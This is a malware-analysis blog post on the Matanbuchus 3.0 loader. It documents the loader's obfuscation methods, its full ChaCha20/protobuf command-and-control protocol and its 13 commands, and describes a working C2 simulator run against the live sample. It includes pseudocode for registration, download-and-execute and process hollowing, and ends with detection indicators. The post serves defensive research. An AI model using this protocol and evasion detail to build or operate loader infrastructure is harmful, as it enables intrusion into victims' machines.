Matanbuchus 3.0 — A Deep Dive into a Loader-as-a-Service

Disclaimer: This blog and all associated research are part of my personal independent study. All hardware, software, and infrastructure are personally owned and funded. No employer resources, property, or proprietary information are used in any part of this work. All opinions and content are my own.

1. Introduction

Matanbuchus is a Loader-as-a-Service (LaaS) that has been active in the cybercriminal underground since at least 2021, marketed and sold on dark web forums under the operator alias BelialDemon. The malware operates as a first-stage loader within a multi-phase infection chain: once deployed on a compromised host, it establishes persistence, fingerprints the victim’s environment, opens a covert communication channel with a remote command-and-control server, and subsequently retrieves and executes secondary payloads at the operator’s discretion. Its service-based business model means that multiple threat actors may employ the same tooling with different C2 infrastructure, making Matanbuchus a recurring presence across diverse intrusion campaigns.

In December 2025, Zscaler’s ThreatLabz published a detailed technical analysis of Matanbuchus 3.0, covering its updated C2 protocol, protobuf serialization, and command structure. In February 2026, Huntress released a complementary write-up documenting a Matanbuchus variant delivered via a ClickFix social-engineering campaign, covering the initial delivery chain and basic obfuscation.

This report presents our independent, ground-up analysis of a Matanbuchus 3.0 sample obtained in early 2026.

A systematic, granular breakdown of seven distinct obfuscation techniques working in concert, including a detailed examination of the opaque predicate system featuring 34 mutable global variables with runtime write-back mutation—a significant evolution from the simpler 3-variable static approach observed in earlier variants
Complete wire-format documentation of the C2 communication protocol, including the previously undocumented asymmetric length-prefix framing behavior (client-to-server packets carry a 4-byte prefix; server-to-client responses do not), the 48-byte ChaCha20 packet header structure, and the precise nanopb protobuf message schemas reverse-engineered from embedded descriptors
Comprehensive analysis of all 13 command handlers (IDs 1 through 13) and their underlying dispatch architecture, which routes tasks through 6 categorized linked lists with support for payload delivery, system reconnaissance, remote execution, and self-destruct capabilities
The development and live validation of a fully functional C2 server simulator implemented in Python, capable of completing the entire registration–tasking–result collection lifecycle against the actual malware binary executing in a sandboxed environment, thereby confirming the accuracy of our protocol reverse engineering

1.1 Sample Information

Property	Value
SHA256	77a53dc757fdf381d3906ab256b74ad3cdb7628261c58a62bcc9c6ca605307ba
File Type	PE32 DLL (Dynamic Link Library)
Exports	Start, DllEntryPoint
C2 Domain	mechiraz[.]com
C2 Endpoints	/api/v1 (register), /api/v2 (poll/results)
Encryption	ChaCha20 (no Poly1305 MAC)
Serialization	nanopb (lightweight Protocol Buffers)
Transport	WinHTTP, HTTPS POST, Content-Type: application/octet-stream
Polling Interval	300 seconds (5 minutes)

2. Execution Flow

The malware is packaged as a 32-bit PE DLL and must be loaded via SysWOW64\rundll32.exe using the exported function Start as the entry point. Attempting to invoke the DLL with the 64-bit rundll32.exe or through an incorrect export name will result in silent failure. The initialization sequence is methodical: the entry point hands off control to a core setup routine that decrypts all embedded strings via ChaCha20, resolves critical Windows API functions through MurmurHash3-based dynamic lookup, generates a unique bot identifier derived from system characteristics, collects detailed host fingerprinting data, and ultimately spawns a dedicated thread responsible for all subsequent C2 communication and command execution.

2.1 Execution Chain

Matanbuchus execution chain - DllEntryPoint to C2 thread

2.2 Key Functions

Address	Function Name	Purpose
0x1007A1E0	mw_Start	Exported entry point, calls mw_main_init
0x100739C0	mw_main_init	Core initialization: crypto, API resolution, C2 thread spawn
0x10069210	mw_c2_thread	Main C2 loop: register → poll → dispatch (3,258 lines, 500+ locals)
0x10075020	mw_command_dispatcher_loop	Processes task linked lists, dispatches to command handlers
0x1004D0F0	mw_register_beacon	Builds and sends registration protobuf
0x10048700	mw_get_tasks_from_c2	Polls C2 for tasks, parses TaskResponse
0x100613D0	mw_http_send_recv	WinHTTP POST wrapper with ChaCha20 encrypt/decrypt
0x10058180	mw_chacha20_decrypt_packet	Decrypts incoming C2 response
0x100587F0	mw_chacha20_encrypt_packet	Encrypts outgoing C2 request
0x10002900	mw_resolve_apis	MurmurHash-based dynamic API resolution

3. Obfuscation Techniques

Matanbuchus 3.0 employs a sophisticated, multi-layered obfuscation framework comprising seven distinct techniques that operate synergistically to impede both static and dynamic analysis. Collectively, these mechanisms inflate the binary from an estimated 100 KB of genuine operational logic to approximately 59 MB of total file size, with roughly 90% of all decompiled code constituting pure noise. For the reverse engineer, recognizing and mentally filtering these obfuscation layers is the single most important prerequisite for productive analysis. Once the analyst develops a reliable intuition for distinguishing real logic from noise—primarily by tracing function calls and ignoring local variable assignments—the underlying malware behavior becomes considerably more tractable. The table below provides a summary of each technique; detailed analysis follows in the subsections.

#	Technique	Impact	Key Indicator
1	Opaque Predicates	Control flow obfuscation	34 mutable globals at 0x1011A160–0x1011A220
2	Dead Store Injection	~90% junk code per function	500+ locals, 0x33B0 stack frames
3	Junk API Calls	Anti-analysis noise	GetCursorPos, IsIconic, GetACP calls
4	Arithmetic Obfuscation	Obscured constants/indices	imul/shl chains for simple values
5	String Encryption	No plaintext strings	ChaCha20 with key at 0x10112000
6	Dynamic API Resolution	No import table entries	MurmurHash3 with seed 0x4F1866
7	Binary Size Inflation	59 MB total file size	.data section: 57.7 MB of junk

3.1 Opaque Predicates

The most pervasive obfuscation technique in this sample is a system of 34 mutable global variables located at addresses 0x1011A160 through 0x1011A220. These globals serve as the foundation for opaque predicates—conditional branches whose outcomes are predetermined at compile time but appear data-dependent to the analyst. What distinguishes this implementation from conventional opaque predicates is its runtime write-back mutation: each time an opaque predicate is evaluated, the branch body modifies one or more globals with values derived from arithmetic transformations of their current state. This creates a cascading chain of state changes that renders static symbolic analysis of branch outcomes computationally infeasible, as the value of each global depends on the entire prior execution history.

The global variables employ intentionally mixed data types—including byte, word, dword, and qword—which forces the decompiler to generate type casts and sign-extension operations that further obscure the code. The write-back mutations incorporate a diverse set of arithmetic and bitwise operations (XOR, addition with carry, modular multiplication, bit rotation), and—critically—the return values from junk API calls (see Section 3.3) are fed directly into these globals. This means the predicate state becomes partially dependent on the execution environment (cursor position, code page, tick count), creating a form of environment-sensitive anti-analysis that varies across machines and execution contexts.

// Example opaque predicate pattern from mw_c2_thread
// Real code buried between predicate checks:

global_1011A1C0 = (global_1011A1C0 ^ 0x3FA7) + result_GetACP;
if ( (global_1011A1A8 & 0x7F3E) > 0x1234 )  // Always true or always false
{
    v350 = some_junk_computation;
    global_1011A1E0 = v350 * 0x91;           // Write-back mutation
}
// ... actual C2 logic follows ..

Address Range	Count	Types	Notes
0x1011A160–0x1011A180	8	DWORD, QWORD	Primary predicate set
0x1011A180–0x1011A1A0	8	BYTE, WORD, DWORD	Mixed-type set
0x1011A1A0–0x1011A1C0	8	DWORD, QWORD	Secondary predicate set
0x1011A1C0–0x1011A1E0	5	WORD, DWORD	API-seeded set
0x1011A1E0–0x1011A220	5	DWORD, QWORD	Write-back mutation targets

3.2 Dead Store Injection

Every function of significance within the binary is aggressively inflated with hundreds of dead store operations—assignments to local variables whose values are never subsequently consumed by any meaningful computation path. These dead stores are not trivial single-instruction insertions; they often involve multi-step arithmetic expressions, memory reads, and interactions with the opaque predicate globals, making them difficult to distinguish from legitimate logic through casual inspection alone. The C2 thread function (mw_c2_thread) provides the most extreme illustration: IDA Pro’s decompiler produces 3,258 lines of pseudocode with over 500 declared local variables and a stack frame of 0x33B0 bytes, of which our analysis estimates approximately 90% to be dead store noise. The practical effect is that an analyst must carefully trace data flow from function call return values and system API results to identify the thin thread of genuine C2 logic woven through thousands of lines of carefully constructed noise.

Function	Total Lines	Est. Real Lines	Local Variables	Stack Size
mw_c2_thread	3,258	~300	500+	0x33B0
mw_register_beacon	~2,000	~200	350+	0x2800
mw_get_tasks_from_c2	~1,500	~150	300+	0x2400
mw_handle_exe_cmd	~1,800	~180	400+	0x2C00

// Dead store example from mw_c2_thread
// Notice: v87, v88, v90, v91 are never read again

v87 = global_1011A1A0 * 0x47;
v88 = v87 + GetCursorPos(&pt);
v89 = actual_c2_registration_call();  // <-- REAL CODE
v90 = v88 ^ 0xBEEF;
v91 = v90 + IsIconic(0);
global_1011A1C8 = v91;                // Write-back to opaque predicate

3.3 Junk API Calls

Interspersed throughout the code are calls to legitimate Windows API functions whose return values serve no functional purpose within the malware’s operational logic. These junk API invocations fulfill a dual obfuscation role. First, they generate substantial noise in dynamic analysis traces—an API monitor or sandbox log will contain hundreds of seemingly meaningful system calls that mask the relatively few calls that actually matter. Second, and more insidiously, their return values are fed directly into the opaque predicate globals (Section 3.1), meaning these calls actively participate in the runtime mutation of the predicate state. Because functions like GetCursorPos and GetACP return environment-dependent values, they introduce a degree of non-determinism into the predicate chain that further frustrates automated deobfuscation attempts.

API Function	Typical Arguments	Purpose in Obfuscation
GetEnvironmentVariableW	Random variable names	Return value seeds opaque predicates; triggers API logging noise
GetCursorPos	Stack pointer	Mouse position feeds into global mutation; environment-dependent
IsIconic	NULL or window handle	Window state check; return value used in arithmetic chains
GetACP	(none)	ANSI code page; locale-dependent seed for predicates
GetTickCount	(none)	Timing-dependent value for predicate mutation

3.4 Arithmetic Obfuscation

Throughout the binary, simple integer constants and array indices are replaced with multi-step arithmetic expressions that arrive at the same value through obfuscated computation. The obfuscation framework also exploits compiler behavior by promoting 32-bit values to __int64 type, triggering the use of 64-bit imul and shl instruction sequences in the generated assembly. These patterns closely resemble legitimate compiler optimizations for division-by-constant and modular arithmetic, which makes them particularly insidious: an analyst cannot simply flag all arithmetic chains as junk, because the same instruction patterns appear in genuine compiler-generated code. Careful data-flow tracing is required to determine whether a given arithmetic sequence feeds into a meaningful operation or is merely decorative noise.

// Arithmetic obfuscation example
// What should be: array[i * 4] becomes:

v42 = (unsigned __int64)(0x66666667i64 * (int)v41) >> 32;
v43 = ((v42 >> 31) + v42) * 5;
result = *(DWORD *)(base + (v41 - v43) * 4);

3.5 String Encryption (ChaCha20)

No meaningful plaintext strings exist within the binary at rest. All operationally significant strings—including C2 URLs, HTTP headers, user-agent strings, registry key paths, and WMI query templates—are encrypted using ChaCha20 and stored in a consolidated encrypted string table. At runtime, individual strings are decrypted on demand by invoking the decryptor function with a table index. The same static 32-byte key and 12-byte nonce are used for all string decryption operations, meaning that recovery of these two values enables bulk decryption of the entire string table—a significant analytical shortcut once identified. Decrypted strings are cached in heap-allocated buffers for subsequent lookups, so a memory dump of the running process will reveal the full set of decrypted strings if captured after the initialization phase completes.

Component	Address	Size	Description
ChaCha20 Key	0x10112000	32 bytes	Static encryption key for all strings
ChaCha20 Nonce	0x10112020	12 bytes	Static nonce
Encrypted Table	0x101128A8	Variable	Table of encrypted string entries
Decryptor Function	0x10005520 (sub_10005520)	—	Decrypts a string by table index

// String decryption pattern
// sub_10005520(index) returns decrypted string

wchar_t* url = sub_10005520(42);    // Decrypts C2 URL
wchar_t* ua  = sub_10005520(37);    // Decrypts User-Agent
// Strings are decrypted into heap-allocated buffers
// and cached for subsequent lookups

3.6 Dynamic API Resolution (MurmurHash3)

To avoid revealing its capabilities through the import address table, the malware resolves virtually all sensitive Windows API functions at runtime through a custom dynamic resolution mechanism. The resolver employs MurmurHash3_x86_32 with a hardcoded seed of 0x4F1866 to hash API function names. During initialization, the batch resolver (mw_resolve_apis at 0x10002900) iterates through a table of target hashes, walks the export directory of each loaded DLL, computes the MurmurHash3 of every export name, and stores matching function pointers in a global resolution table. This approach means the PE import table contains only a minimal set of benign imports required for the loader stub, while the actual operational API surface—including WinHTTP networking functions, process manipulation APIs, and memory management routines—remains invisible to static analysis tools. The hash seed value is a useful signature for detection: any binary computing MurmurHash3 with seed 0x4F1866 against DLL export names is a strong indicator of Matanbuchus lineage.

Component	Address	Description
Hash Function	0x10004870 (sub_10004870)	MurmurHash3_x86_32 implementation
API Resolver	0x10002FB0 (sub_10002FB0)	Walks DLL exports, matches by hash
Batch Resolver	0x10002900 (mw_resolve_apis)	Resolves all APIs during initialization
Hash Seed	0x4F1866	Constant seed for MurmurHash3

Selected API hash mappings:

API Function	Hash Value	DLL
Sleep	0x84C78203	kernel32.dll
VirtualAlloc	0xE0C220B3	kernel32.dll
VirtualFree	0x2B4E48A5	kernel32.dll
CreateThread	0x0A2A72F0	kernel32.dll
WinHttpOpen	0x97C6D21E	winhttp.dll
WinHttpConnect	0xAB2F5712	winhttp.dll
WinHttpSendRequest	0x39017E3F	winhttp.dll
WinHttpReceiveResponse	0x6B9B1826	winhttp.dll
WinHttpReadData	0xB2D17E24	winhttp.dll

3.7 Binary Size Inflation

The compiled binary is dramatically inflated to approximately 59 MB—roughly 600 times larger than the estimated size of its actual executable logic. The inflation is achieved primarily through a massive .data section padded with 57.7 MB of non-functional data. This technique serves multiple evasion purposes: many automated sandbox environments impose file-size thresholds and will skip or time-out on oversized samples; malware repositories and analysis pipelines may reject uploads exceeding size limits; and manual analysis tools (disassemblers, decompilers, hex editors) experience degraded performance when processing files of this magnitude. The approach is crude but effective—it imposes a tangible cost on every stage of the analysis pipeline while requiring essentially zero effort from the malware developer.

Section	Virtual Size	Raw Size	Characteristics
.text	876 KB	876 KB	Code — contains all executable logic
.rdata	~200 KB	~200 KB	Read-only data, protobuf descriptors
.data	57.7 MB	57.7 MB	Junk padding data
.rsrc	~4 KB	~4 KB	Resources (minimal)
Total	~59 MB	~59 MB	~600x inflation over real code

3.8 Comparison with Prior Variants

A side-by-side comparison of our sample with the variant analyzed by Huntress reveals meaningful evolutionary progression in the obfuscation framework. While the core architecture remains consistent—both variants employ the same fundamental obfuscation categories (opaque predicates, dead stores, ChaCha20 string encryption, MurmurHash3 API resolution)—the implementation sophistication has increased substantially. The opaque predicate system, in particular, has undergone a significant upgrade: from 3 fixed-value globals to 34 mutable globals with active write-back mutation and environment-dependent seeding. This suggests that the Matanbuchus developers are actively investing in hardening their obfuscation layer against the specific deobfuscation techniques published by the security research community.

Feature	This Sample	Huntress Variant
Opaque Predicate Globals	34 mutable	3 fixed
Global Types	Mixed (byte/word/dword/qword)	DWORD only
Write-back Mutation	Yes — every branch updates globals	No — globals are static
Environment Seeding	Yes — junk API returns seed globals	No
Dead Stores per Function	350+ (major functions)	~100
String Encryption	ChaCha20	ChaCha20
API Resolution	MurmurHash3 (seed 0x4F1866)	MurmurHash3 (same seed)
Binary Size	~59 MB	~59 MB

4. C2 Communication Protocol

The command-and-control protocol employs a clean layered architecture with well-defined boundaries between transport, encryption, and serialization. At the transport layer, all communication flows over HTTPS using WinHTTP POST requests. The encryption layer wraps every payload in a ChaCha20 cipher stream with per-packet random keys. The serialization layer uses nanopb-based Protocol Buffers to structure messages. A critical and previously undocumented detail uncovered during our analysis is the asymmetric framing of packets: client-to-server transmissions include a 4-byte little-endian length prefix before the encrypted payload, while server-to-client responses are sent as raw encrypted payloads without any length prefix. Failure to account for this asymmetry is the single most common reason a C2 server implementation will fail to communicate with the malware.

4.1 Transport Layer

All C2 communication is conducted over HTTPS using the WinHTTP API suite (not the higher-level WinINet library). The malware resolves WinHTTP functions dynamically via MurmurHash3 and establishes a persistent HTTPS session to the hardcoded C2 domain. Every request is a POST with Content-Type: application/octet-stream, carrying a binary payload consisting of the encrypted protobuf message. Two distinct endpoints are used: /api/v1 exclusively for initial bot registration, and /api/v2 for all subsequent operations including task polling and result reporting. The choice of WinHTTP over WinINet is noteworthy because WinHTTP provides more granular control over TLS settings and proxy configuration, and is less likely to trigger behavioral detections that monitor WinINet’s higher-level caching and cookie-handling mechanisms.

Property	Registration	Task Polling / Result Reporting
Endpoint	POST /api/v1	POST /api/v2
Content-Type	application/octet-stream	application/octet-stream
TLS	HTTPS (port 443)	HTTPS (port 443)
Client Framing	4-byte LE length prefix + encrypted payload	4-byte LE length prefix + encrypted payload
Server Framing	No length prefix — raw encrypted payload	No length prefix — raw encrypted payload
Handler Function	mw_register_beacon (0x1004D0F0)	mw_get_tasks_from_c2 (0x10048700)

4.2 Packet Encryption (ChaCha20)

Every packet exchanged between client and server is encrypted using the ChaCha20 stream cipher. Each packet carries a self-contained 48-byte header prepended to the ciphertext, which includes all the cryptographic material necessary for decryption: a randomly generated 32-byte key, a 12-byte nonce, and a 4-byte little-endian integer specifying the plaintext size. This per-packet key generation means that even identical plaintext payloads will produce different ciphertexts across transmissions. A critical weakness in this design is the complete absence of a Poly1305 MAC or any other authentication tag—the malware uses raw ChaCha20 without authenticated encryption (i.e., not ChaCha20-Poly1305). This means an attacker with network access could modify ciphertext bytes in transit, and the malware would blindly decrypt and process the tampered plaintext without detecting the manipulation.

ChaCha20 packet structure - 48-byte header layout

Offset	Size	Field	Description
0x00	32 bytes	ChaCha20 Key	Randomly generated per-packet encryption key
0x20	12 bytes	ChaCha20 Nonce	Randomly generated per-packet nonce
0x2C	4 bytes	Plaintext Size	Little-endian uint32, size of decrypted protobuf
0x30	Variable	Ciphertext	ChaCha20-encrypted protobuf data

4.3 Protobuf Serialization (nanopb)

The malware uses nanopb, a lightweight, pure-C implementation of Google’s Protocol Buffers designed for resource-constrained and embedded environments. Unlike standard protobuf implementations that generate code from .proto schema files, nanopb embeds compact binary descriptors directly in the compiled binary’s .rdata section. These descriptors define the field numbers, wire types, and nesting relationships for each message type. By locating and parsing these descriptors, we were able to reconstruct the complete protobuf schema without access to the original source definitions—a crucial step that enabled the development of our C2 server simulator.

Descriptor Address	Message Name	Field Count	Usage
0x100DDB18	OuterWrapper	3	Wraps registration and result-report messages
0x100DDB30	TaskResponse	3+	Server response containing task entries
0x100DDB48	TaskEntry	5+	Individual task with command ID and parameters
0x100DDB60	ResultReport	3	Client report of task execution results

4.4 Outer Wrapper

Registration and result-report messages are encapsulated within an OuterWrapper protobuf envelope that provides message-type discrimination and status signaling. This wrapper contains three fields: a data bytes field carrying the serialized inner message, a request_type varint indicating the operation (register, poll, or report), and a status varint used in server responses to signal success or failure. An important protocol asymmetry must be noted: while registration and result-report messages use this OuterWrapper envelope, the task polling response bypasses it entirely—the server sends a raw TaskResponse protobuf without any OuterWrapper encapsulation. This inconsistency is not immediately obvious from static analysis alone and was confirmed through live traffic analysis during our C2 simulation testing.

Field #	Name	Protobuf Type	Description
1	data	bytes	Serialized inner message (registration beacon or result report)
2	request_type	varint	1 = Register, 2 = GetTasks, 3 = ReportResults
3	status	varint	Response status (must be non-zero/1 for success)

4.5 Registration Beacon

Upon establishing initial contact with the C2 server, the malware constructs and transmits a comprehensive registration beacon containing detailed system fingerprinting data. This beacon serves as the bot’s self-introduction to the operator’s infrastructure, providing all the information necessary for the operator to assess the compromised host’s value, target appropriate secondary payloads, and tailor subsequent tasking. The beacon is serialized as a protobuf message, wrapped in an OuterWrapper with request_type=1, encrypted with a fresh ChaCha20 key, prefixed with a 4-byte length header, and transmitted via HTTPS POST to the /api/v1 registration endpoint.

Field #	Name	Type	Description
1	bot_id	string (UTF-16LE)	Unique bot identifier, generated from system info
2	os_version	string (UTF-16LE)	Windows version string (e.g., “10.0”)
3	computer_name	string (UTF-16LE)	NetBIOS computer name
4	username	string (UTF-16LE)	Current logged-in username
5	domain	string (UTF-16LE)	Domain or workgroup name
6	is_admin	varint (bool)	1 if running with admin privileges
7	is_64bit	varint (bool)	1 if running on 64-bit OS
8	cpu_info	string (UTF-16LE)	Processor name from registry
9	gpu_info	string (UTF-16LE)	GPU description from WMI
10	ram_mb	varint	Total physical RAM in MB
11	install_date	string (UTF-16LE)	Windows installation date
12	antivirus	string (UTF-16LE)	Installed AV product name(s)

The server must respond with a valid OuterWrapper protobuf where the status field is set to a non-zero value (specifically 1 for success). Internally, the malware’s mw_register_beacon function extracts this status value and returns it to the caller, which validates it with a test eax, eax; jnz instruction sequence. If the status is zero or the response fails to parse, the malware considers registration unsuccessful and will retry on the next polling cycle. This handshake mechanism ensures that the bot only proceeds to the task-polling phase after receiving explicit acknowledgment from the C2 infrastructure.

// Registration flow (simplified from mw_register_beacon)

OuterWrapper wrapper = {
    .data = serialize_beacon(bot_id, os_ver, ...),
    .request_type = 1,  // Register
};
encrypted = chacha20_encrypt(serialize(wrapper));
response = http_post("/api/v1", length_prefix + encrypted);
decrypted = chacha20_decrypt(response);  // No length prefix!
parsed = parse_outer_wrapper(decrypted);
if (parsed.status == 0) goto retry;

4.6 Task Polling

Following successful registration, the malware enters a persistent polling loop with a default interval of 300 seconds (5 minutes). Each poll iteration constructs an OuterWrapper message with request_type=2 and sends it to the /api/v2 endpoint. The server’s response is where the protocol exhibits a critical asymmetry that tripped our initial C2 server implementation: the response is parsed directly as a TaskResponse protobuf—it is not wrapped in an OuterWrapper. This was confirmed by tracing the code path in mw_get_tasks_from_c2 (0x10048700), which passes the decrypted response directly to mw_parse_task_response (0x1007A730) using the TaskResponse descriptor at 0x100DDB30, bypassing the OuterWrapper parsing logic entirely. If the server has no pending tasks, it should return an empty TaskResponse; the malware will sleep for the configured interval and poll again.

TaskResponse fields:

Field #	Name	Type	Description
1	tasks	repeated TaskEntry	Array of task entries to execute
2	sleep_interval	varint	Optional: override polling interval (ms)
3	kill_flag	varint	If non-zero, malware terminates

TaskEntry fields:

Field #	Name	Type	Description
1	task_id	string	Unique task identifier (ASCII)
2	command_id	varint	Command type (1–13)
3	args	repeated string	Command arguments (URLs, paths, etc.)
4	execution_mode	varint	Sub-mode for commands with variants
5	timeout	varint	Task execution timeout (ms)

4.7 Result Reporting

After executing each assigned task, the malware constructs a result report and transmits it back to the C2 server via the /api/v2 endpoint with request_type=3. The report is wrapped in an OuterWrapper envelope (unlike task responses, result reports do use the wrapper). The ResultReport protobuf contains three fields: the bot identifier, the task ID being reported on, and the result data containing command output or a status message. A subtle but important encoding detail is that the task_id field uses ASCII encoding, while both bot_id and result_data use UTF-16LE. This encoding mismatch was a source of parsing errors during our C2 server development and must be handled explicitly in any implementation.

Field #	Name	Type	Description
1	bot_id	string (UTF-16LE)	Bot identifier (same as registration)
2	task_id	string (ASCII)	Task ID being reported (note: ASCII, not UTF-16LE)
3	result_data	string (UTF-16LE)	Command output or status message

⚠️ Note: The task_id field in ResultReport uses ASCII encoding, unlike bot_id and result_data which use UTF-16LE. This encoding mismatch must be handled correctly in any C2 server implementation.

5. Command Dispatch

The command dispatcher (mw_command_dispatcher_loop at 0x10075020) implements a task-processing architecture that routes incoming commands through a system of 6 categorized linked lists, each corresponding to a logical command group: payload delivery, DLL loading, system installation, reconnaissance, remote execution, and control operations. When the task-polling function receives a TaskResponse containing one or more TaskEntry items, each entry is classified by its command ID and appended to the appropriate linked list. The dispatcher loop then processes each list in sequence, dequeuing entries and routing them to their respective handler functions. A separate kill flag can be set by the C2 server to instruct the malware to terminate all operations, clean up artifacts, and exit—providing the operator with an emergency shutdown mechanism.

5.1 Command Reference

The malware supports a total of 13 distinct commands assigned sequential IDs from 1 through 13. These commands span four operational categories: payload delivery (commands 1–4, covering EXE execution, DLL loading, MSI installation, and shellcode injection), reconnaissance (commands 5–8, enumerating processes, services, installed applications, and Windows updates), remote execution (commands 9–11, providing cmd.exe, PowerShell, and WMI execution capabilities), and control (commands 12–13, for self-destruction and configuration updates). The following table provides a comprehensive reference for all supported commands.

ID	Command	Category	Handler Address	Description
1	Download & Execute EXE	Payload Delivery	0x100AA920	Downloads and executes a PE executable; 3 execution modes
2	Load DLL	Payload Delivery	0x100A7E00	Downloads and loads a DLL; 4 loading modes
3	Install MSI	Payload Delivery	0x100AC580	Downloads and installs an MSI package
4	Execute Shellcode	Payload Delivery	0x100B5420	Downloads and injects shellcode into memory
5	Enumerate Processes	Reconnaissance	0x100B1E10	Lists running processes (name, PID, path)
6	Enumerate Services	Reconnaissance	0x100B3E10	Lists Windows services and their status
7	Enumerate Installed Apps	Reconnaissance	0x100B6600	Lists installed applications from registry
8	Enumerate Windows Updates	Reconnaissance	0x100ACF10	Lists installed Windows updates/patches
9	Execute CMD	Remote Execution	0x100A6FE0	Executes a command via cmd.exe /c
10	Execute PowerShell	Remote Execution	0x100B0360	Executes a PowerShell command/script
11	Execute WMI	Remote Execution	0x100B94F0	Executes a WMI query or command
12	Self-Destruct	Control	0x100BE6F0	Cleans up and terminates the malware
13	Update Config	Control	—	Updates C2 configuration (URL, interval, etc.)

5.2 Download & Execute (Command 1)

Command 1 represents the primary payload delivery mechanism and is the most operationally significant command in the Matanbuchus repertoire. It supports three distinct execution modes that provide the operator with a spectrum of stealth-versus-simplicity trade-offs. The handler function downloads the specified payload from a URL provided in the task arguments, writes it to a temporary location (unless using the in-memory mode), and executes it according to the selected mode. Upon completion, the handler reports success or failure back to the C2 server via a ResultReport message.

Mode	Method	Description
0	CreateProcess	Standard process creation; payload written to disk first
1	ShellExecuteEx	Shell execution with verb handling; supports runas for elevation
2	Process Hollowing	Spawns suspended process, hollows it, injects payload in memory

// Simplified dispatch logic from mw_handle_exe_cmd

void mw_handle_exe_cmd(TaskEntry* task) {
    BYTE* payload = download_file(task->args[0]);  // URL
    switch (task->execution_mode) {
        case 0: create_process(payload); break;
        case 1: shell_execute(payload); break;
        case 2: process_hollow(payload, task->args[1]); break;
    }
    report_result(task->task_id, "OK");
}

5.3 DLL Loading (Command 2)

The DLL loading command (ID 2) provides four progressively sophisticated loading techniques, ranging from a standard LoadLibrary call to fully reflective injection. Each mode represents an escalation in evasion capability: higher-numbered modes avoid more detection surfaces (disk artifacts, API hooks, loaded-module lists) at the cost of increased implementation complexity and potential compatibility issues.

Mode	Method	Description
0	LoadLibrary	Standard DLL loading via LoadLibraryW
1	Manual Map (disk)	Manual PE mapping from disk; avoids LoadLibrary hooks
2	Manual Map (memory)	Downloads DLL, maps entirely in memory; no disk artifact
3	Reflective Load	Reflective DLL injection into remote process

5.4 Reconnaissance Commands (Commands 5–8)

Commands 5 through 8 provide the operator with comprehensive host reconnaissance capabilities, enabling detailed enumeration of the victim’s running processes, installed services, software inventory, and patch level. Each reconnaissance command collects its data through standard Windows APIs and formats the output as UTF-16LE strings, which are transmitted back to the C2 server in a ResultReport message. This information allows the operator to profile the target environment, identify security software, assess patch status for potential privilege escalation, and select appropriate secondary payloads tailored to the host’s configuration.

Command	Data Collected	Method
5 — Processes	Process name, PID, executable path	CreateToolhelp32Snapshot / Process32First/Next
6 — Services	Service name, display name, status, start type	EnumServicesStatusExW
7 — Installed Apps	Application name, version, publisher, install date	Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
8 — Windows Updates	Update KB number, description, install date	WMI: Win32_QuickFixEngineering

6. C2 Server Simulation

To rigorously validate our protocol reverse engineering and observe the malware’s complete behavioral repertoire in a controlled setting, we developed a fully functional C2 server simulator implemented in Python. The simulator faithfully replicates every layer of the Matanbuchus 3.0 C2 protocol stack—including the asymmetric framing, per-packet ChaCha20 encryption with 48-byte headers, nanopb protobuf serialization, and the correct endpoint routing for registration, task distribution, and result collection. The simulator was tested against the live malware sample executing in an isolated virtual machine, successfully completing full registration–tasking–result lifecycles and confirming the accuracy of every protocol detail documented in this report.

6.1 Architecture

Component	Purpose	Details
HTTPS Server (Flask)	Transport layer	Handles /api/v1 and /api/v2 endpoints; nginx TLS termination
ChaCha20 Engine	Packet encryption/decryption	Implements 48-byte header format; asymmetric framing
Protobuf Handler	Message serialization	Manual protobuf encoding/decoding (no .proto files needed)
Interactive Console	Operator interface	CLI for sending commands and viewing results
Session Manager	Bot tracking	Tracks registered bots and their task queues

A significant implementation challenge was the discovery that nginx is required for TLS termination. Initial attempts to serve HTTPS directly from Python (using Flask’s built-in SSL context and socat-based TLS wrappers) consistently failed during the WinHTTP TLS handshake. Investigation revealed that WinHTTP’s TLS implementation has strict requirements around certificate chain validation and cipher suite negotiation that are not fully satisfied by Python’s ssl module or lightweight TLS proxies. The solution was to deploy nginx as a reverse proxy that handles TLS termination with a self-signed certificate and forwards plaintext HTTP to the Flask backend. This configuration has been reliable across all testing sessions.

# Server startup
$ python3 matanbuchus_c2.py

[*] Matanbuchus C2 Server v3.0
[*] Listening on 0.0.0.0:8443
[*] Endpoints: /api/v1 (register), /api/v2 (tasks/results)
[*] Interactive console ready

matanbuchus> help

6.2 Interactive Console

The simulator provides an interactive command-line console that enables real-time operator interaction with registered bots. The console supports the full range of Matanbuchus commands, allowing the analyst to issue tasks, monitor bot status, and review execution results as they arrive. This interactive capability proved invaluable during testing, as it allowed us to exercise each command handler individually and verify its behavior against our static analysis findings.

Command	Arguments	Description
list	—	List all registered bots with system info
exec		Execute a shell command (cmd.exe)
powershell		Execute a PowerShell command
download	[mode]	Download & execute (mode: 0/1/2)
dll	[mode]	Load DLL (mode: 0/1/2/3)
processes		Enumerate running processes
services		Enumerate Windows services
apps		Enumerate installed applications
updates		Enumerate Windows updates
results	[bot_id]	View task execution results
kill		Send self-destruct command

6.3 Live Test Results

The C2 simulator was validated against the live Matanbuchus sample executing within an isolated, network-segmented virtual machine environment. DNS resolution for the C2 domain was redirected to our analysis host via local DNS manipulation, and nginx handled TLS termination on port 443. The following sequence captures a complete end-to-end C2 interaction cycle—from initial bot registration through task assignment to result collection—demonstrating that every protocol layer functions correctly.

C2 server simulation - bot registration

Registration:

[+] New bot registered:
    Bot ID:    DESKTOP-ABC1234_user1_A7F3B2
    OS:        Windows 10.0
    Computer:  DESKTOP-ABC1234
    User:      user1
    Admin:     No
    64-bit:    Yes
    CPU:       Intel(R) Core(TM) i7-9750H
    RAM:       8192 MB
    AV:        Windows Defender

C2 server simulation - registration details

CMD whoami execution:

C2 server simulation - CMD whoami execution

enumerate process command:

C2 server simulation - enumerate processes command

enumerated processes list, saved in a JSON file:

Enumerated processes list saved as JSON

7. Detection & Mitigation

The following indicators of compromise and behavioral signatures can be used to detect Matanbuchus 3.0 activity at the network and host levels. We also provide a mapping to the MITRE ATT&CK framework to facilitate integration with existing threat intelligence platforms and detection engineering workflows. Network-based detections should focus on the characteristic HTTPS POST pattern to the known endpoint paths, while host-based detections can leverage the unusual file size, the distinctive API resolution pattern, and the specific memory layout of the opaque predicate globals.

7.1 Network Indicators

Indicator	Type	Description
mechiraz[.]com	Domain	Primary C2 domain
/api/v1	URI Path	Registration endpoint
/api/v2	URI Path	Task polling and result reporting endpoint
application/octet-stream	Content-Type	All C2 POST requests use this content type
